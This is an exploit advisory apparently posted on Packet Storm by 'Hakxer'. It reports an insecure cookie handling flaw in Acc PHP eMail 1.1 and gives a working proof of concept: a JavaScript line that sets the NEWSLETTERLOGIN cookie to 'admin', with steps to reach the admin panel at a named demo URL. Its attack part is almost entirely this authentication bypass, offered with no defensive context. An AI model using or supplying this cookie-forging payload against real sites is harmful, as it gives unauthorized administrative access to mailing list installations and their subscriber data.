Acc PHP eMail version 1.1 suffers from an insecure cooking handling vulnerability.
1df3bc475bf61d7fd7564f750cf61bba0ae5b846e691839fa5244bdc7d74a376###########################################################################
______ __ __ ______ __ ______
/ ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___
/ __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \
/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / /
/_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/
/____/
# [~] Discovered by : Hakxer
# [~] Type Gap :Acc PHP eMail v1.1 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/mailinglist/
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################
PoC : javascript:document.cookie="NEWSLETTERLOGIN=admin";
javascript:document.cookie="NEWSLETTERLOGIN=Hakxer";
[~] Admin panel
http://www.accscripts.com/mailinglist/demo/index.php
[~] Execute JS Code javascript:document.cookie="NEWSLETTERLOGIN=admin";
[~] Refresh
# Proud To be a Muslim #
#_=END=_#
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed